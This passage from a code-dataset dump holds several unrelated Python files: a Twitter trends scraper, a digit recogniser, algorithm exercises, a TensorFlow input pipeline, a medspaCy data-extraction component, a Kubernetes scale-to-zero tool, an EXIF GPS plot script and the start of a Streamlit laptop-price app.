\",\"-\").lower()\n\n\ndef get_countries():\n '''\n using beautifull soup and scrap https://trendstwitter.com/ and look for available countries in trends list\n '''\n url = 'https://trendstwitter.com/'\n\n html_text= requests.get(url=url).content\n soup=BeautifulSoup(html_text,\"html.parser\")\n countries_h5=soup.find_all('h5',class_='location-menu__country-header')\n countries_list=[]\n for country in countries_h5:\n countries_list.append(country.text)\n countries_list[0]='Worldwide'\n return countries_list\n\n\n\n\ndef get_trends(country:str):\n '''\n feed with country name and return this countrie trending topics\n '''\n if country.lower()=='worldwide':\n country=''\n country=format_country_name(country)\n url = 'https://trendstwitter.com/'+country\n\n html_text= requests.get(url=url).content\n soup=BeautifulSoup(html_text,\"html.parser\")\n tends_li=soup.find('ol',class_='trend-card__list').find_all('li')\n df=pd.DataFrame(columns=[\"trends\",\"links\",\"volumes\"])\n for li in tends_li:\n tends_data={}\n volume=li.find('div',class_=\"oltweets\")\n if volume is None:\n tends_data[\"volumes\"]=0\n else:\n tends_data[\"volumes\"]=int(volume.text.split()[0])\n tends_data[\"links\"]=li.find('a')['href']\n tends_data[\"trends\"]=li.find('a').text\n df=pd.concat([df,pd.DataFrame(tends_data,index={1})],ignore_index=True)\n\n return df.sort_values(by=['volumes'], ascending=False)\n\n\n\n\ndef fetch_tweets(hachtag:str):\n '''\n feed with a topic string and retrun 200 last tweet data about this topic\n '''\n config = twint.Config()\n columns=['conversation_id', 'date', 'language', 'username', 'tweet','nretweets', 'nlikes', 'hashtags']\n config.Limit=200\n config.Hide_output = True\n config.Search = hachtag\n config.Pandas=True\n twint.run.Search(config)\n df=twint.storage.panda.Tweets_df[columns]\n return df\n\n\ndef find_common_trends(trends_1:list,trends_2:list):\n '''\n feed with two list of topics and return common elements in these list\n '''\n common= [trend for trend in trends_1 if trend in trends_2]\n return 
common","repo_name":"isaac-bix/Twitter-Data-Visualisation-and-Graph-Analytics","sub_path":"models/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36258590888","text":"from PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom statistics import mean\r\nfrom functools import reduce\r\nfrom collections import Counter #counts number of items in list and prints dictionary\r\nimport pyttsx3\r\nengine = pyttsx3.init()\r\ndef say(text):\r\n engine.say(\"The number is \" + str(text))\r\n engine.runAndWait()\r\ndef createExamples():\r\n\tnumberArrayExamples = open('numArEx.txt','a')\r\n\tnumbersWeHave = range(0,10)\r\n\tversionsWeHave = range(1,10)\r\n\r\n\tfor eachnumbers in numbersWeHave:\r\n\t\tfor eachversion in versionsWeHave:\r\n\t\t\t#print (str(eachnumbers)+'.'+str(eachversion))\r\n\t\t\timagefilepath='images/numbers/' + (str(eachnumbers)+'.'+str(eachversion))+'.png'\r\n\t\t\texampleimage = Image.open(imagefilepath)\r\n\t\t\texampleimagearray=np.array(exampleimage)\r\n\t\t\texampleimagearray1=str(exampleimagearray.tolist())\r\n\t\t\tlinetowrite = str(eachnumbers)+'::'+exampleimagearray1+'\\n'\r\n\t\t\tnumberArrayExamples.write(linetowrite)\r\n\r\n#createExamples() #function call to train the program for values\r\n#defining a function that turns the image to a black and white image( grayscale )\r\ndef threshold(imagearray):\r\n\tbalancearray=[] #declaring a balance array\r\n\tnewarray = imagearray\r\n\tfor eachrow in imagearray:\r\n\t\tfor eachpixel in eachrow:\r\n\t\t\taveragepixel = mean(eachpixel) #reduce(lambda x,y:x+y,eachpixel[:3])/len(eachpixel[:3])\r\n\t\t\tbalancearray.append(averagepixel)\r\n\tbalance = mean(balancearray) #reduce(lambda x,y:x+y,balancearray/len(balancearray))\r\n\tfor eachrow in newarray:\r\n\t\tfor eachpixel in eachrow:\r\n\t\t\tif mean(eachpixel) > balance:\r\n\t\t\t\teachpixel[0]=255\r\n\t\t\t\teachpixel[1]=255\r\n\t\t\t\teachpixel[2]=255\r\n\t\t\t\teachpixel[3]=255\r\n\t\t\telse:\r\n\t\t\t\teachpixel[0]=0\r\n\t\t\t\teachpixel[1]=0\r\n\t\t\t\teachpixel[2]=0\r\n\t\t\t\teachpixel[3]=255\r\n\treturn newarray\r\ndef whatNumberisthis(filepath):\r\n\tmatchedArray=[]\r\n\tloadExamples = open('numArEx.txt','r').read()\r\n\tloadExamples = loadExamples.split('\\n')\r\n\timage = Image.open(filepath)\r\n\timagearray = np.array(image)\r\n\timagearray1 = imagearray.tolist()\r\n\r\n\tinQuestion = str(imagearray1)\r\n\r\n\tfor eachExamples in loadExamples:\r\n\t\tif(len(eachExamples)>3):\r\n\t\t\tsplitExamples = eachExamples.split(\"::\")\r\n\t\t\tcurrentElement = splitExamples[0]\r\n\t\t\tcurrentArray = splitExamples[1]\r\n\r\n\t\t\teachpixelExample = currentArray.split('],')\r\n\r\n\t\t\teachpixelinQuestion = inQuestion.split('],')\r\n\r\n\t\t\telement = 0\r\n\t\t\twhile(element 4600):\r\n\t\tgraphY.append(element[eachelement])\t\r\n\tsay (ele)\r\n\tsay (ele)\r\n\r\n\tfigure = plt.figure()\r\n\taxis1=plt.subplot2grid((4,4),(0,0),rowspan=1,colspan=4)\r\n\taxis2=plt.subplot2grid((4,4),(1,0),rowspan=1,colspan=4)\r\n\r\n\taxis1.imshow(imagearray)\r\n\taxis2.bar(graphX,graphY,align='center')\r\n\r\n\txlocation = plt.MaxNLocator(12)\r\n\taxis2.xaxis.set_major_locator(xlocation)\r\n\r\n\r\n\tplt.ylim(400) #limit y axis\r\n\tplt.show()\r\n\r\n\r\n\r\nwhatNumberisthis('images/test.png')\r\n\r\n\r\n'''\r\n#opening images as array\r\nimage1 = Image.open('images/numbers/0.1.png')\r\nimagearray1 = 
np.array(image1)\r\n\r\nimage2 = Image.open('images/numbers/y0.4.png')\r\nimagearray2 = np.array(image2)\r\n\r\nimage3 = Image.open('images/numbers/y0.5.png')\r\nimagearray3 = np.array(image3)\r\n\r\nimage4 = Image.open('images/sentdex.png')\r\nimagearray4 = np.array(image4)\r\n\r\n\r\nthreshold(imagearray2)\r\nthreshold(imagearray3)\r\nthreshold(imagearray4)\r\n\r\n#plotting images in a graph with rows8 and column 6\r\n\r\nfigure=plt.figure()\r\naxis1 = plt.subplot2grid((8,6),(0,0),rowspan=4,colspan=3)\r\naxis2 = plt.subplot2grid((8,6),(4,0),rowspan=4,colspan=3)\r\naxis3 = plt.subplot2grid((8,6),(0,3),rowspan=4,colspan=3)\r\naxis4 = plt.subplot2grid((8,6),(4,3),rowspan=4,colspan=3)\r\n\r\n#showing images in axis\r\n\r\naxis1.imshow(imagearray1)\r\naxis2.imshow(imagearray2)\r\naxis3.imshow(imagearray3)\r\naxis4.imshow(imagearray4)\r\n\r\n#displaying/printing axis\r\n\r\nplt.show()\r\n'''\r\n","repo_name":"bsreeram08/Number-Recogonizer","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14307720052","text":"def gcd(a,b):\n if b ==0:\n return a\n return gcd(b, a% b)\n\ndef solve(A,B,C):\n\n lcm = B*C / gcd(B,C)\n\n val = lcm\n count = 0\n i = 2\n while val <= A:\n val = i * lcm\n i += 1\n count += 1\n return count\n\nA = 12\nB = 2\nC = 3\nprint(solve(A,B,C))","repo_name":"SauravSinha76/scaler2","sub_path":"class34/diviser_game.py","file_name":"diviser_game.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1498585553","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'getWays' function below.\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. 
LONG_INTEGER_ARRAY c\n#\n\n\ndef getWays(n, c):\n # Write your code here\n dp = [0 for _ in range(n + 1)]\n dp[0] = 1\n m = len(c)\n c.sort()\n for j in range(m):\n for i in range(1, n + 1):\n if i >= c[j]:\n dp[i] += dp[i - c[j]]\n return dp[n]\n\n\narr = []\nn = len(arr)\ni, j = 0, 0\ncntV, plusOne, minusOne = 0, 0, 0\nres = 0\nwhile j < n:\n if arr[j] == arr[i]:\n cntV += 1\n j += 1\n continue\n if arr[j] == arr[i] + 1:\n if minusOne == 0:\n plusOne += 1\n j += 1\n continue\n res = max(res, minusOne + cntV)\n pre = arr[i]\n while i < j:\n if pre == arr[i]:\n cntV -= 1\n else:\n minusOne -= 1\n if minusOne == 0:\n break\n i += 1\n continue\n if arr[j] == arr[i] - 1:\n if plusOne == 0:\n minusOne += 1\n j += 1\n continue\n res = max(res, plusOne + cntV)\n pre = arr[i]\n while i < j:\n if pre == arr[i]:\n cntV -= 1\n else:\n plusOne -= 1\n if plusOne == 0:\n break\n i += 1\n continue\n if plusOne != 0:\n res = max(res, plusOne + cntV)\n else:\n res = max(res, minusOne + cntV)\n i = j\n\n\nprint(getWays(3, [8, 3, 1, 2]))\n\n# if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n# first_multiple_input = input().rstrip().split()\n\n# n = int(first_multiple_input[0])\n\n# m = int(first_multiple_input[1])\n\n# c = list(map(int, input().rstrip().split()))\n\n# # Print the number of ways of making change for 'n' units using coins having the values given by 'c'\n\n# ways = getWays(n, c)\n\n# fptr.write(str(ways) + '\\n')\n\n# fptr.close()\n","repo_name":"weiliping/codingbasics","sub_path":"src/main/py/interviewbit/Dynamic_Programming/getWays.py","file_name":"getWays.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73147939528","text":"\"\"\"Create the input data pipeline using `tf.data`\"\"\"\n\nimport tensorflow as tf\nimport os\n\n#import model.mnist_dataset as mnist_dataset\n\n\n# def train_input_fn(data_dir, params):\n# \"\"\"Train input function for the MNIST dataset.\n\n# Args:\n# data_dir: (string) path to the data directory\n# params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n# \"\"\"\n# dataset = mnist_dataset.train(data_dir)\n# dataset = dataset.shuffle(params.train_size) # whole dataset into the buffer\n# dataset = dataset.repeat(params.num_epochs) # repeat for multiple epochs\n# dataset = dataset.batch(params.batch_size)\n# dataset = dataset.prefetch(1) # make sure you always have one batch ready to serve\n# return dataset\n\n\n# def test_input_fn(data_dir, params):\n# \"\"\"Test input function for the MNIST dataset.\n\n# Args:\n# data_dir: (string) path to the data directory\n# params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n# \"\"\"\n# dataset = mnist_dataset.test(data_dir)\n# dataset = dataset.batch(params.batch_size)\n# dataset = dataset.prefetch(1) # make sure you always have one batch ready to serve\n# return dataset\n\ndef _parse_function(filename, label, size):\n \"\"\"Obtain the image from the filename (for both training and validation).\n\n The following operations are applied:\n - Decode the image from jpeg format\n - Convert to float and to range [0, 1]\n \"\"\"\n image_string = tf.read_file(filename)\n\n # Don't use tf.image.decode_image, or the output shape will be undefined\n image_decoded = tf.image.decode_jpeg(image_string, channels=3)\n\n # This will convert to float values in [0, 1]\n image = tf.image.convert_image_dtype(image_decoded, tf.float32)\n\n resized_image = 
tf.image.resize_images(image, [size, size])\n\n return resized_image, label\n\ndef train_preprocess(image, label, use_random_flip):\n \"\"\"Image preprocessing for training.\n\n Apply the following operations:\n - Horizontally flip the image with probability 1/2\n - Apply random brightness and saturation\n \"\"\"\n if use_random_flip:\n image = tf.image.random_flip_left_right(image)\n\n image = tf.image.random_brightness(image, max_delta=32.0 / 255.0)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n\n # Make sure the image is still in [0, 1]\n image = tf.clip_by_value(image, 0.0, 1.0)\n\n return image, label\n\ndef grayscale(image, label):\n image = tf.image.rgb_to_grayscale(image)\n return image, label\n\ndef input_fn(is_training, filenames, labels, params):\n \"\"\"Input function for the SIGNS dataset.\n\n The filenames have format \"{label}_IMG_{id}.jpg\".\n For instance: \"data_dir/2_IMG_4584.jpg\".\n\n Args:\n is_training: (bool) whether to use the train or test pipeline.\n At training, we shuffle the data and have multiple epochs\n filenames: (list) filenames of the images, as [\"data_dir/{label}_IMG_{id}.jpg\"...]\n labels: (list) corresponding list of labels\n params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n \"\"\"\n num_samples = len(filenames)\n assert len(filenames) == len(labels), \"Filenames and labels should have same length\"\n\n # Create a Dataset serving batches of images and labels\n # We don't repeat for multiple epochs because we always train and evaluate for one epoch\n parse_fn = lambda f, l: _parse_function(f, l, params.image_size)\n train_fn = lambda f, l: train_preprocess(f, l, params.use_random_flip)\n gray_fn = lambda f, l: grayscale(f, l)\n\n if is_training:\n dataset = (tf.data.Dataset.from_tensor_slices((tf.constant(filenames), tf.constant(labels)))\n .shuffle(num_samples) # whole dataset into the buffer ensures good shuffling\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .map(train_fn, num_parallel_calls=params.num_parallel_calls)\n .map(gray_fn, num_parallel_calls=params.num_parallel_calls)\n .repeat(params.num_epochs)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n else:\n dataset = (tf.data.Dataset.from_tensor_slices((tf.constant(filenames), tf.constant(labels)))\n .map(parse_fn)\n .map(gray_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n\n # Create reinitializable iterator from dataset\n # iterator = dataset.make_initializable_iterator()\n # images, labels = iterator.get_next()\n # iterator_init_op = iterator.initializer\n\n # inputs = {'images': images, 'labels': labels, 'iterator_init_op': iterator_init_op}\n return dataset\n\ndef train_datas(data_dir):\n train_data_dir = os.path.join(data_dir, \"train_faces\")\n # Get the filenames from the train sets\n train_filenames = [os.path.join(train_data_dir, f) for f in os.listdir(train_data_dir)\n if f.endswith('.jpg')]\n # Labels\n train_labels = [int(f.split('/')[-1].split('_')[0]) for f in train_filenames]\n return train_filenames, train_labels\n\ndef train_input_fn(data_dir, params):\n train_filenames, train_labels = train_datas(data_dir)\n # Specify the sizes of the dataset we train on and evaluate on\n params.train_size = len(train_filenames)\n # Create the iterator\n return input_fn(True, train_filenames, train_labels, params)\n\ndef test_datas(data_dir):\n test_data_dir = 
os.path.join(data_dir, \"test_faces\")\n # Get the filenames from the test sets\n test_filenames = [os.path.join(test_data_dir, f) for f in os.listdir(test_data_dir)\n if f.endswith('.jpg')]\n # Labels\n test_labels = [int(f.split('/')[-1].split('_')[0]) for f in test_filenames]\n return test_filenames, test_labels\n\ndef test_input_fn(data_dir, params):\n test_filenames, test_labels = test_datas(data_dir)\n # Specify the sizes of the dataset we test on and evaluate on\n params.test_size = len(test_filenames)\n # Create the iterator\n return input_fn(False, test_filenames, test_labels, params)","repo_name":"Conglang/DeepOps","sub_path":"facenet_face_recognition/model/input_fn.py","file_name":"input_fn.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13001617538","text":"from collections import OrderedDict\nfrom spacy.language import Language\n\nALLOWED_DATA_TYPES = (\"ent\", \"section\", \"context\", \"doc\")\n\nDEFAULT_ENT_ATTRS = (\n \"text\",\n \"start_char\",\n \"end_char\",\n \"label_\",\n \"is_negated\",\n \"is_uncertain\",\n \"is_historical\",\n \"is_hypothetical\",\n \"is_family\",\n \"section_category\",\n \"section_parent\",\n)\n\nDEFAULT_DOC_ATTRS = (\"text\",)\n\nALLOWED_SECTION_ATTRS = (\n \"section_category\",\n \"section_title_text\",\n \"section_title_start_char\",\n \"section_title_end_char\",\n \"section_text\",\n \"section_text_start_char\",\n \"section_text_end_char\",\n \"section_parent\",\n)\n\nALLOWED_CONTEXT_ATTRS = (\n \"ent_text\",\n \"ent_label_\",\n \"ent_start_char\",\n \"ent_end_char\",\n \"modifier_text\",\n \"modifier_category\",\n \"modifier_direction\",\n \"modifier_start_char\",\n \"modifier_end_char\",\n \"modifier_scope_start_char\",\n \"modifier_scope_end_char\",\n)\n\nDEFAULT_ATTRS = {\n \"ent\": DEFAULT_ENT_ATTRS,\n \"section\": ALLOWED_SECTION_ATTRS,\n \"context\": ALLOWED_CONTEXT_ATTRS,\n \"doc\": DEFAULT_DOC_ATTRS,\n}\n\n\n@Language.factory(\"medspacy_doc_consumer\")\nclass DocConsumer:\n \"\"\"A DocConsumer object will consume a spacy doc and output rows based on a configuration provided by the user.\"\"\"\n\n def __init__(self, nlp, name=\"medspacy_doc_consumer\", dtypes=(\"ent\",), dtype_attrs=None):\n \"\"\"Create a new DocConsumer.\n\n This component extracts structured information from a Doc. Information is stored in\n doc._.data, which is a nested dictionary. The outer keys represent the data type of\n can be either:\n - \"ent\": data about the spans in doc.ents such as the text, label,\n context attributes, section information, or custom attributes\n - \"section\": data about the sections within the notes, such as the\n section text and category\n - \"context\": data about entity-modifier pairs extracted by ConText\n - \"doc\": a single doc-level representation. By default only doc.text is extracted,\n but other attributes may be specified\n\n Once processed, a doc's data can be accessed either by:\n - doc._.data\n - doc._.get_data(dtype=...)\n - doc._.ent_data\n - doc._.to_dataframe(dtype=...)\n\n Args:\n nlp: A spaCy model\n dtypes (tuple or str): Either a tuple of data types to collect or the string \"all\".\n Default (\"ent\",)\n Valid options are (\"ent\", \"section\", \"context\", \"doc\")\n\n dtype_attrs(dict or None): An optional dictionary mapping the data types in dtypes to a list\n of attributes. If None, will set defaults for each dtype. 
Attributes for \"ent\" and \"doc\"\n may be customized be adding either native or custom attributes (ie., ent._....)\n \"context\" and \"section\" may only include the attributes contained in the default.\n Default values for each dtype can be retrieved by the class method DocConsumer.get_default_attrs()\n \"\"\"\n self.nlp = nlp\n self.name = name\n if not isinstance(dtypes, tuple):\n if dtypes == \"all\":\n dtypes = tuple(ALLOWED_DATA_TYPES)\n else:\n raise ValueError(\"dtypes must be either 'all' or a tuple, not {0}\".format(dtypes))\n for dtype in dtypes:\n if dtype not in ALLOWED_DATA_TYPES:\n raise ValueError(\"Invalid dtypes. Supported dtypes are {0}, not {1}\".format(ALLOWED_DATA_TYPES, dtype))\n if dtype == \"section\":\n self.validate_section_attrs(dtype_attrs)\n self.dtypes = dtypes\n self.dtype_attrs = dtype_attrs\n\n if self.dtype_attrs is None:\n self.set_default_attrs()\n\n @classmethod\n def get_default_attrs(cls, dtypes=None):\n if dtypes is None:\n dtypes = ALLOWED_DATA_TYPES\n else:\n if isinstance(dtypes, str):\n dtypes = (dtypes,)\n for dtype in dtypes:\n if dtype not in ALLOWED_DATA_TYPES:\n raise ValueError(\"Invalid dtype,\", dtype)\n dtype_attrs = {dtype: list(attrs) for (dtype, attrs) in DEFAULT_ATTRS.items() if dtype in dtypes}\n return dtype_attrs\n\n def set_default_attrs(self):\n self.dtype_attrs = self.get_default_attrs(self.dtypes)\n\n def validate_section_attrs(self, attrs):\n \"\"\"Validate that section attributes are either not specified or are valid attribute names.\"\"\"\n if attrs is None:\n return True\n if \"section\" not in attrs:\n return True\n diff = set(attrs[\"section\"]).difference(ALLOWED_SECTION_ATTRS)\n if diff:\n raise ValueError(\"Invalid section dtype_attrs specified: {0}\".format(diff))\n return True\n\n def __call__(self, doc):\n data = dict()\n for dtype, attrs in self.dtype_attrs.items():\n data.setdefault(dtype, OrderedDict())\n for attr in attrs:\n data[dtype][attr] = list()\n if \"ent\" in self.dtypes:\n for ent in doc.ents:\n for attr in self.dtype_attrs[\"ent\"]:\n try:\n val = getattr(ent, attr)\n except AttributeError:\n val = getattr(ent._, attr)\n data[\"ent\"][attr].append(val)\n if \"context\" in self.dtypes:\n for (ent, modifier) in doc._.context_graph.edges:\n self.add_context_edge_attributes(ent, modifier, data[\"context\"])\n if \"section\" in self.dtypes:\n for section in doc._.sections:\n self.add_section_attributes(section, data[\"section\"])\n if \"doc\" in self.dtypes:\n for attr in self.dtype_attrs[\"doc\"]:\n try:\n val = getattr(doc, attr)\n except AttributeError:\n val = getattr(doc._, attr)\n data[\"doc\"][attr].append(val)\n\n doc._.data = data\n return doc\n\n def add_context_edge_attributes(self, ent, modifier, context_data):\n if \"ent_text\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_text\"].append(ent.text)\n if \"ent_label_\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_label_\"].append(ent.label_)\n if \"ent_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_start_char\"].append(ent.start_char)\n if \"ent_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_end_char\"].append(ent.end_char)\n if \"modifier_text\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_text\"].append(modifier.span.text)\n if \"modifier_category\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_category\"].append(modifier.category)\n if \"modifier_direction\" in self.dtype_attrs[\"context\"]:\n 
context_data[\"modifier_direction\"].append(modifier.direction)\n if \"modifier_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_start_char\"].append(modifier.span.start_char)\n if \"modifier_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_end_char\"].append(modifier.span.end_char)\n if \"modifier_scope_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_scope_start_char\"].append(modifier.scope.start_char)\n if \"modifier_scope_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_scope_end_char\"].append(modifier.span.end_char)\n\n def add_section_attributes(self, section, section_data):\n # Allow for null sections\n if \"section_category\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_category\"].append(section.category)\n if section.category is not None:\n if \"section_title_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_text\"].append(section.title_span.text)\n if \"section_title_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_start_char\"].append(section.title_span.start_char)\n if \"section_title_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_end_char\"].append(section.title_span.end_char)\n else:\n if \"section_title_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_text\"].append(None)\n if \"section_title_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_start_char\"].append(0)\n if \"section_title_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_end_char\"].append(0)\n if \"section_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text\"].append(section.section_span.text)\n if \"section_text_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text_start_char\"].append(section.section_span.start_char)\n if \"section_text_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text_end_char\"].append(section.section_span.end_char)\n if \"section_parent\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_parent\"].append(section.parent)\n","repo_name":"Tshimanga/medspacy","sub_path":"medspacy/io/doc_consumer.py","file_name":"doc_consumer.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70129662730","text":"# 1. 
근묵자흑\n\nn, k = map(int, input().split())\nnumbers = list(map(int, input().split()))\nmin_number = min(numbers)\nmin_index = numbers.index(min_number)\n\nstart = min_index - (k-1)\nif start < 0:\n start = 0\n\nmin_count = n\nwhile start <= min_index:\n end = start + (k-1)\n count = 1\n i, j = start, end\n while i > 0:\n count += 1\n i -= (k-1)\n while j < n-1:\n count += 1\n j += (k-1)\n min_count = min(min_count, count)\n start += 1\nprint(min_count)","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"EXAM/스코페2021모의문제/[1]근묵자흑.py","file_name":"[1]근묵자흑.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39209485737","text":"#!/usr/bin/env python3\n\nimport click\nimport click_log\nimport logging\nimport time\nfrom zero_scale.app import scale_to_zero as zero\n\nlogger = logging.getLogger(__name__)\nclick_log.basic_config(logger)\n\n\n@click.command()\n@click_log.simple_verbosity_option(logger)\n@click.option('-s', '--scale', 'scale',\n default=0,\n help='Sets the scale of a deployment')\n@click.option('-p', '--period', 'period',\n default=60,\n help='The time (seconds) between checks')\n@click.option('--success-threshold', 'success_threshold',\n default=5,\n help='Number of positive results before action is taken')\n@click.option('-n', '--namespace', 'namespace',\n default='default',\n help='The k8 namespace')\n@click.option('-h', '--hpa', 'hpa_name',\n default='default',\n help='The HPA name')\n@click.option('-m', '--metric-name', 'metric_name',\n default='default',\n help='The metric name')\n@click.option('-d', '--deployment', 'deployment_name',\n default='default',\n help='The deployment to modify')\ndef run(scale, period, success_threshold, namespace, hpa_name, metric_name, deployment_name):\n\n\n params = click.get_current_context().params\n scaler = zero.ScaleToZero(params)\n successes = 0\n\n while True:\n try:\n time.sleep(period)\n logger.debug(f'successes: %s', successes)\n\n # Only call these once per iteration, saves overloading the API\n current_metric_value = scaler.current_metric_value()\n current_scale = scaler.current_scale()\n\n # Skip current iteration if scale is already 0\n if (current_metric_value == 0 and current_scale == 0):\n logger.info(f'Scale already 0 - skipping')\n continue\n\n # Scale to 0 if number of positive results are hit\n if successes == success_threshold:\n logger.info(f'Metric is zero: Scaling %s to 0', deployment_name)\n scaler.scale_deployment(0)\n successes = 0\n continue\n\n # HPA is disabled when target deployment scale is zero.\n # Force scale to be 1 if metrics > 1\n if (current_metric_value > 1 and current_scale == 0):\n logger.info(f'Non zero metric detected: Scaling to 1')\n scaler.scale_deployment(1)\n continue\n\n # Keep track of positive results\n if current_metric_value == 0:\n successes += 1\n else:\n logger.info('Metric not zero: Letting the HPA do its thing')\n successes = 0\n\n\n except Exception as e:\n logger.info(e)\n pass\n\nif __name__ == '__main__':\n run()\n","repo_name":"livelink/K8-HPAScaleToZero","sub_path":"zero_scale/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"32263155315","text":"from flask import *\nfrom Capstone.models import db\nproj = Blueprint('proj',\n __name__,\n template_folder='templates',\n static_folder='static',\n url_prefix='/proj')\n\n# create project - Jamia\n# 
proj/new\n\n# edit/ delete project - Jessica\n# proj/edit\n# proj/del\n\n# Find and search projects - Jamia\n# proj/browse\n\n# project view based on role - luke\n# proj/view\n\n# appy/accept to project - Luke\n\n# invite to project - Lily\n\n# project calendar - luke","repo_name":"jmoreno0587/Capstone","sub_path":"Capstone/Capstone/featProjects/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43751596655","text":"from os import walk\nfrom exif import Image\nfrom matplotlib import pyplot as plt\n\nfilenames = next(walk(\"./pokemon\"), (None, None, []))[2]\nimg_coords= list()\n\nfor filename in filenames:\n img_path = \"./pokemon/\"+ filename\n with open(img_path, 'rb') as src:\n img = Image(src)\n \n lat = (float(img.gps_latitude[0]) + float(img.gps_latitude[1])/60 + float(img.gps_latitude[1])/(60*60)) \n long = (float(img.gps_longitude[0]) + float(img.gps_longitude[1])/60 + float(img.gps_longitude[1])/(60*60)) \n\n img_coords.append([lat, long])\n\n\nplt.scatter(*zip(*img_coords))\nplt.show()\n","repo_name":"MartinSkatvedt/AdventCalendars2022","sub_path":"Knowit/12/password.py","file_name":"password.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73157509128","text":"\r\n# cd \"/Users/HP/OneDrive/Documents/Python Anaconda/Streamlit_Laptop_App\"\r\n# streamlit run AppPredictionLaptop.py\r\n\r\n# API: https://docs.streamlit.io/library/api-reference\r\n# dashboard: https://www.youtube.com/watch?v=Sb0A9i6d320\r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\n\r\n# other libraries\r\nfrom PIL import Image\r\nimport requests\r\nfrom streamlit_lottie import st_lottie\r\nfrom plotly import graph_objs as go\r\n\r\nfile1 = open('pipe.pkl', 'rb')\r\nrf = pickle.load(file1)\r\nfile1.close()\r\n\r\ndata = pd.read_csv(\"traineddata.csv\")\r\n\r\ndef main():\r\n # emojis: https://www.webfx.com/tools/emoji-cheat-sheet/\r\n # animations: https://lottiefiles.com/search?q=pc&category=animations\r\n st.set_page_config(page_icon=\":computer:\", layout=\"wide\")\r\n\r\n st.sidebar.title(\"NAVIGATION\")\r\n\r\n menu = [\"Home\", \"Visualisation\", \"Model described\", \"About\"]\r\n \r\n choice = st.sidebar.radio(\"Please select a page:\", menu)\r\n \r\n st.sidebar.markdown(\"\"\"---\"\"\")\r\n\r\n st.sidebar.subheader(\"More info:\"); \r\n st.sidebar.write(\":computer: https://jaroslavkotrba.com\")\r\n \r\n st.sidebar.write(\"Copyright © 2022\")\r\n\r\n #st.sidebar.write(\":star:\"*5)\r\n\r\n if choice == \"Home\":\r\n # Title\r\n st.markdown(\"
    Laptop Price Predictor
    \", unsafe_allow_html=True)\r\n\r\n # Image\r\n from PIL import Image\r\n image = Image.open('./pc.png')\r\n st.image(image, caption='Laptop Price Prediction with AI', use_column_width=True)\r\n \r\n st.write(\"
    Predict the price of a laptop that would suit your needs the best.
